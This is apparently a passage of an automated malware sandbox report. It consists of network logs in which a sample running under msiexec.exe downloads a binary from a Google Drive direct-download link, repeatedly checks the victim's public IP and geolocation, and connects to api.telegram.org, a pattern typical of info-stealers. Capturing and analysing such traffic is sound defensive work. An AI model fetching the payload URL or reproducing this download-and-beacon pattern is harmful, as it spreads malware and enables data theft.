                                                                            Oct 21, 2024 11:04:16.758598089 CEST8062521158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:17.403842926 CEST8062521158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:17.404880047 CEST62522443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:17.404912949 CEST44362522188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:17.404979944 CEST62522443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:17.405198097 CEST62522443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:17.405213118 CEST44362522188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:17.444047928 CEST6252180192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:18.050585032 CEST44362522188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:18.051927090 CEST62522443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:18.051947117 CEST44362522188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:18.194622993 CEST44362522188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:18.194716930 CEST44362522188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:18.194773912 CEST62522443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:18.195139885 CEST62522443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:18.198138952 CEST6252180192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:18.199141979 CEST6252380192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:18.203429937 CEST8062521158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:18.203497887 CEST6252180192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:18.203972101 CEST8062523158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:18.204092979 CEST6252380192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:18.204130888 CEST6252380192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:18.208906889 CEST8062523158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:18.845242023 CEST8062523158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:18.846343994 CEST62524443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:18.846421003 CEST44362524188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:18.846503019 CEST62524443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:18.846731901 CEST62524443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:18.846767902 CEST44362524188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:18.897270918 CEST6252380192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:19.642677069 CEST44362524188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:19.644118071 CEST62524443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:19.644176006 CEST44362524188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:19.783818960 CEST44362524188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:19.783904076 CEST44362524188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:19.784120083 CEST62524443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:19.784383059 CEST62524443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:19.786856890 CEST6252380192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:19.787756920 CEST6252580192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:19.792186975 CEST8062523158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:19.792246103 CEST6252380192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:19.792644024 CEST8062525158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:19.792712927 CEST6252580192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:19.792762995 CEST6252580192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:19.797532082 CEST8062525158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:20.837758064 CEST8062525158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:20.838015079 CEST8062525158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:20.838063002 CEST6252580192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:20.838846922 CEST62526443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:20.838888884 CEST44362526188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:20.838952065 CEST62526443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:20.839251995 CEST62526443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:20.839271069 CEST44362526188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:21.465409994 CEST44362526188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:21.466903925 CEST62526443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:21.466934919 CEST44362526188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:21.608923912 CEST44362526188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:21.609024048 CEST44362526188.114.97.3192.168.2.4
                                                                            Oct 21, 2024 11:04:21.609167099 CEST62526443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:21.609308004 CEST62526443192.168.2.4188.114.97.3
                                                                            Oct 21, 2024 11:04:21.631293058 CEST6252580192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:21.637605906 CEST8062525158.101.44.242192.168.2.4
                                                                            Oct 21, 2024 11:04:21.637672901 CEST6252580192.168.2.4158.101.44.242
                                                                            Oct 21, 2024 11:04:21.640795946 CEST62527443192.168.2.4149.154.167.220
                                                                            Oct 21, 2024 11:04:21.640832901 CEST44362527149.154.167.220192.168.2.4
                                                                            Oct 21, 2024 11:04:21.640892982 CEST62527443192.168.2.4149.154.167.220
                                                                            Oct 21, 2024 11:04:21.641215086 CEST62527443192.168.2.4149.154.167.220
                                                                            Oct 21, 2024 11:04:21.641225100 CEST44362527149.154.167.220192.168.2.4
                                                                            Oct 21, 2024 11:04:22.477734089 CEST44362527149.154.167.220192.168.2.4
                                                                            Oct 21, 2024 11:04:22.477798939 CEST62527443192.168.2.4149.154.167.220
                                                                            Oct 21, 2024 11:04:22.479965925 CEST62527443192.168.2.4149.154.167.220
                                                                            Oct 21, 2024 11:04:22.479978085 CEST44362527149.154.167.220192.168.2.4
                                                                            Oct 21, 2024 11:04:22.480178118 CEST44362527149.154.167.220192.168.2.4
                                                                            Oct 21, 2024 11:04:22.481313944 CEST62527443192.168.2.4149.154.167.220
                                                                            Oct 21, 2024 11:04:22.527415991 CEST44362527149.154.167.220192.168.2.4
                                                                            Oct 21, 2024 11:04:22.720374107 CEST44362527149.154.167.220192.168.2.4
                                                                            Oct 21, 2024 11:04:22.720439911 CEST44362527149.154.167.220192.168.2.4
                                                                            Oct 21, 2024 11:04:22.720634937 CEST62527443192.168.2.4149.154.167.220
                                                                            Oct 21, 2024 11:04:22.722404003 CEST62527443192.168.2.4149.154.167.220
                                                                            Oct 21, 2024 11:04:29.072984934 CEST6251380192.168.2.4158.101.44.242
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Oct 21, 2024 11:04:00.510355949 CEST53571661.1.1.1192.168.2.4
                                                                            Oct 21, 2024 11:04:02.057693958 CEST6254053192.168.2.41.1.1.1
                                                                            Oct 21, 2024 11:04:02.064623117 CEST53625401.1.1.1192.168.2.4
                                                                            Oct 21, 2024 11:04:03.633045912 CEST6046853192.168.2.41.1.1.1
                                                                            Oct 21, 2024 11:04:03.640368938 CEST53604681.1.1.1192.168.2.4
                                                                            Oct 21, 2024 11:04:08.191706896 CEST5782453192.168.2.41.1.1.1
                                                                            Oct 21, 2024 11:04:08.199623108 CEST53578241.1.1.1192.168.2.4
                                                                            Oct 21, 2024 11:04:09.377654076 CEST5245853192.168.2.41.1.1.1
                                                                            Oct 21, 2024 11:04:09.385179043 CEST53524581.1.1.1192.168.2.4
                                                                            Oct 21, 2024 11:04:21.631869078 CEST6183053192.168.2.41.1.1.1
                                                                            Oct 21, 2024 11:04:21.640366077 CEST53618301.1.1.1192.168.2.4
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Oct 21, 2024 11:04:02.057693958 CEST192.168.2.41.1.1.10x7b1cStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                            Oct 21, 2024 11:04:03.633045912 CEST192.168.2.41.1.1.10x7264Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                            Oct 21, 2024 11:04:08.191706896 CEST192.168.2.41.1.1.10x35c9Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                            Oct 21, 2024 11:04:09.377654076 CEST192.168.2.41.1.1.10x11daStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                            Oct 21, 2024 11:04:21.631869078 CEST192.168.2.41.1.1.10x5aeeStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Oct 21, 2024 11:04:02.064623117 CEST1.1.1.1192.168.2.40x7b1cNo error (0)drive.google.com142.250.185.206A (IP address)IN (0x0001)false
                                                                            Oct 21, 2024 11:04:03.640368938 CEST1.1.1.1192.168.2.40x7264No error (0)drive.usercontent.google.com216.58.206.33A (IP address)IN (0x0001)false
                                                                            Oct 21, 2024 11:04:08.199623108 CEST1.1.1.1192.168.2.40x35c9No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                            Oct 21, 2024 11:04:08.199623108 CEST1.1.1.1192.168.2.40x35c9No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                            Oct 21, 2024 11:04:08.199623108 CEST1.1.1.1192.168.2.40x35c9No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                            Oct 21, 2024 11:04:08.199623108 CEST1.1.1.1192.168.2.40x35c9No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                            Oct 21, 2024 11:04:08.199623108 CEST1.1.1.1192.168.2.40x35c9No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                            Oct 21, 2024 11:04:08.199623108 CEST1.1.1.1192.168.2.40x35c9No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                            Oct 21, 2024 11:04:09.385179043 CEST1.1.1.1192.168.2.40x11daNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                            Oct 21, 2024 11:04:09.385179043 CEST1.1.1.1192.168.2.40x11daNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                            Oct 21, 2024 11:04:21.640366077 CEST1.1.1.1192.168.2.40x5aeeNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                            • drive.google.com
                                                                            • drive.usercontent.google.com
                                                                            • reallyfreegeoip.org
                                                                            • api.telegram.org
                                                                            • checkip.dyndns.org
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.462510158.101.44.242807808C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 21, 2024 11:04:08.209033012 CEST151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Oct 21, 2024 11:04:08.885462999 CEST323INHTTP/1.1 200 OK
                                                                            Date: Mon, 21 Oct 2024 09:04:08 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 3fa3d4b546c27a9d1fdc3990e1ca225b
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>
                                                                            Oct 21, 2024 11:04:08.888746977 CEST127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Oct 21, 2024 11:04:09.039673090 CEST323INHTTP/1.1 200 OK
                                                                            Date: Mon, 21 Oct 2024 09:04:08 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 2682f45d59653cdf473e87186bc93a2b
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>
                                                                            Oct 21, 2024 11:04:10.164840937 CEST127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Oct 21, 2024 11:04:10.315489054 CEST323INHTTP/1.1 200 OK
                                                                            Date: Mon, 21 Oct 2024 09:04:10 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: a0d0a056d013a2afda1e65e5870afd7a
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.462513158.101.44.242807808C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 21, 2024 11:04:11.072485924 CEST127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Oct 21, 2024 11:04:11.715086937 CEST323INHTTP/1.1 200 OK
                                                                            Date: Mon, 21 Oct 2024 09:04:11 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: a3dda45343b8ec91f2d9ab7b48ac467b
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.462515158.101.44.242807808C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 21, 2024 11:04:12.482969046 CEST151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Oct 21, 2024 11:04:13.137375116 CEST323INHTTP/1.1 200 OK
                                                                            Date: Mon, 21 Oct 2024 09:04:13 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 06fe7d7feae51a93bf52e41fc3a05da0
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.462517158.101.44.242807808C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 21, 2024 11:04:13.903266907 CEST151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Oct 21, 2024 11:04:14.552258968 CEST323INHTTP/1.1 200 OK
                                                                            Date: Mon, 21 Oct 2024 09:04:14 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 8cb383614382f4d7c945845f171f27a7
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.462519158.101.44.242807808C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 21, 2024 11:04:15.323848009 CEST151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Oct 21, 2024 11:04:15.967912912 CEST323INHTTP/1.1 200 OK
                                                                            Date: Mon, 21 Oct 2024 09:04:15 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 8b54369603e426d006772063a29b97ad
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.462521158.101.44.242807808C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 21, 2024 11:04:16.753762960 CEST151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Oct 21, 2024 11:04:17.403842926 CEST323INHTTP/1.1 200 OK
                                                                            Date: Mon, 21 Oct 2024 09:04:17 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 732cab14cd3b02afa096b88549275943
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.462523158.101.44.242807808C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 21, 2024 11:04:18.204130888 CEST151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Oct 21, 2024 11:04:18.845242023 CEST323INHTTP/1.1 200 OK
                                                                            Date: Mon, 21 Oct 2024 09:04:18 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 645524543128b2bc06b83ef5f69298e8
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.462525158.101.44.242807808C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 21, 2024 11:04:19.792762995 CEST151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Oct 21, 2024 11:04:20.837758064 CEST323INHTTP/1.1 200 OK
                                                                            Date: Mon, 21 Oct 2024 09:04:20 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 0e95bb082c142a0cb8042ebe50f2b425
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>
                                                                            Oct 21, 2024 11:04:20.838015079 CEST323INHTTP/1.1 200 OK
                                                                            Date: Mon, 21 Oct 2024 09:04:20 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 0e95bb082c142a0cb8042ebe50f2b425
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.462508142.250.185.2064437808C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-21 09:04:03 UTC216OUTGET /uc?export=download&id=1ItIBdLavxGfZi6rWeX-K_CF9nDPwNWT3 HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                            Host: drive.google.com
                                                                            Cache-Control: no-cache
                                                                            2024-10-21 09:04:03 UTC1610INHTTP/1.1 303 See Other
                                                                            Content-Type: application/binary
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Mon, 21 Oct 2024 09:04:03 GMT
                                                                            Location: https://drive.usercontent.google.com/download?id=1ItIBdLavxGfZi6rWeX-K_CF9nDPwNWT3&export=download
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy: script-src 'nonce-e_fapOL391C56i0VHYopHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Server: ESF
                                                                            Content-Length: 0
                                                                            X-XSS-Protection: 0
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            X-Content-Type-Options: nosniff
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.462509216.58.206.334437808C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-21 09:04:04 UTC258OUTGET /download?id=1ItIBdLavxGfZi6rWeX-K_CF9nDPwNWT3&export=download HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                            Cache-Control: no-cache
                                                                            Host: drive.usercontent.google.com
                                                                            Connection: Keep-Alive
                                                                            2024-10-21 09:04:07 UTC4897INHTTP/1.1 200 OK
                                                                            Content-Type: application/octet-stream
